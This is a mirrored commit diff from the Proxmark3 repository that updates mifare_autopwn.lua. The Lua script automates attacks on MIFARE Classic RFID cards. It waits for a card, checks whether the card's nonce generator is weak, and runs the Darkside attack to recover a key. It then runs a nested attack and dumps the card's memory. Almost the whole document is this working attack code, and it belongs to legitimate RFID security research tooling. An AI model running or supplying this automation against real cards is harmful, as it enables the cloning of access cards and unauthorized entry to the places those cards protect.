github/proxmark3
1
0
Fork 0
mirror of https://github.com/Proxmark/proxmark3.git synced 2025-08-22 22:23:38 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

chg: 'script run mifare_autopwn' added the prng_test, to make sure it only attacks weak cards.

Browse source
This commit is contained in:
iceman1001 2017-07-31 15:53:26 +02:00
commit 6df9012de5
1 changed files with 49 additions and 32 deletions
Download patch file Download diff file Expand all files Collapse all files

81
client/scripts/mifare_autopwn.lua
View file

@ -26,25 +26,23 @@ Output files from this operation:
-- Some utilities -- Some utilities
------------------------------- -------------------------------
local DEBUG = false local DEBUG = false
local MIFARE_AUTH_KEYA = 0x60
local MIFARE_AUTH_KEYB = 0x61
--- ---
-- A debug printout-function -- A debug printout-function
function dbg(args) local function dbg(args)
if DEBUG then if DEBUG then
print(":: ", args) print(":: ", args)
end end
end end
--- ---
-- This is only meant to be used when errors occur -- This is only meant to be used when errors occur
function oops(err) local function oops(err)
print("ERROR: ",err) print("ERROR: ",err)
return nil,err return nil,err
end end
--- ---
-- Usage help -- Usage help
function help() local function help()
print(desc) print(desc)
print("Example usage") print("Example usage")
print(example) print(example)
@ -54,7 +52,7 @@ end
-- Waits for a mifare card to be placed within the vicinity of the reader. -- Waits for a mifare card to be placed within the vicinity of the reader.
-- @return if successfull: an table containing card info -- @return if successfull: an table containing card info
-- @return if unsuccessfull : nil, error -- @return if unsuccessfull : nil, error
function wait_for_mifare() local function wait_for_mifare()
while not core.ukbhit() do while not core.ukbhit() do
res, err = reader.read1443a() res, err = reader.read1443a()
if res then return res end if res then return res end
@ -63,7 +61,7 @@ function wait_for_mifare()
return nil, "Aborted by user" return nil, "Aborted by user"
end end
function nested(key,sak) local function nested(key,sak)
local typ = 1 local typ = 1
if 0x18 == sak then --NXP MIFARE Classic 4k | Plus 4k | Ev1 4k if 0x18 == sak then --NXP MIFARE Classic 4k | Plus 4k | Ev1 4k
typ = 4 typ = 4
@ -82,7 +80,7 @@ function nested(key,sak)
core.console(cmd) core.console(cmd)
end end
function dump(uid) local function dump(uid)
core.console("hf mf dump") core.console("hf mf dump")
-- Save the global args, those are *our* arguments -- Save the global args, those are *our* arguments
local myargs = args local myargs = args
@ -97,10 +95,22 @@ function dump(uid)
-- Set back args. Not that it's used, just for the karma... -- Set back args. Not that it's used, just for the karma...
args = myargs args = myargs
end end
--
-- performs a test if tag nonce uses weak or hardend prng
local function perform_prng_test()
local isweak = core.detect_prng()
if isweak == 1 then
dbg('PRNG detection : WEAK nonce detected')
return true
end
dbg('PRNG detection : HARDEND nonce detected')
return false
end
--- ---
-- The main entry point -- The main entry point
function main(args) local function main(args)
local verbose, exit, res, uid, err, _, sak local verbose, exit, res, uid, err, _, sak
local seen_uids = {} local seen_uids = {}
@ -121,33 +131,40 @@ function main(args)
-- Seen already? -- Seen already?
uid = res.uid uid = res.uid
sak = res.sak sak = res.sak
if not seen_uids[uid] then if not seen_uids[uid] then
-- Store it -- Store it
seen_uids[uid] = uid seen_uids[uid] = uid
print("Card found, commencing crack on UID", uid)
-- Crack it -- check if PRNG is WEAK
local key, cnt if perform_prng_test() then
err, res = core.mfDarkside() print("Card found, commencing crack on UID", uid)
if err == -1 then return oops("Button pressed. Aborted.") -- Crack it
elseif err == -2 then return oops("Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).") local key, cnt
elseif err == -3 then return oops("Card is not vulnerable to Darkside attack (its random number generator is not predictable).") err, res = core.mfDarkside()
elseif err == -4 then return oops([[ if err == -1 then return oops("Button pressed. Aborted.")
Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown elseif err == -2 then return oops("Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).")
generating polynomial with 16 effective bits only, but shows unexpected behaviour.]]) elseif err == -3 then return oops("Card is not vulnerable to Darkside attack (its random number generator is not predictable).")
elseif err == -5 then return oops("Aborted via keyboard.") elseif err == -4 then return oops([[
end Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown
-- The key is actually 8 bytes, so a generating polynomial with 16 effective bits only, but shows unexpected behaviour.]])
-- 6-byte key is sent as 00XXXXXX elseif err == -5 then return oops("Aborted via keyboard.")
-- This means we unpack it as first end
-- two bytes, then six bytes actual key data -- The key is actually 8 bytes, so a
-- We can discard first and second return values -- 6-byte key is sent as 00XXXXXX
_,_,key = bin.unpack("H2H6",res) -- This means we unpack it as first
print("Found valid key: "..key); -- two bytes, then six bytes actual key data
-- We can discard first and second return values
_,_,key = bin.unpack("H2H6",res)
print("Found valid key: "..key);
-- Use nested attack -- Use nested attack
nested(key,sak) nested(key,sak)
-- Dump info -- Dump info
dump(uid) dump(uid)
end
print_message = true print_message = true
end end
end end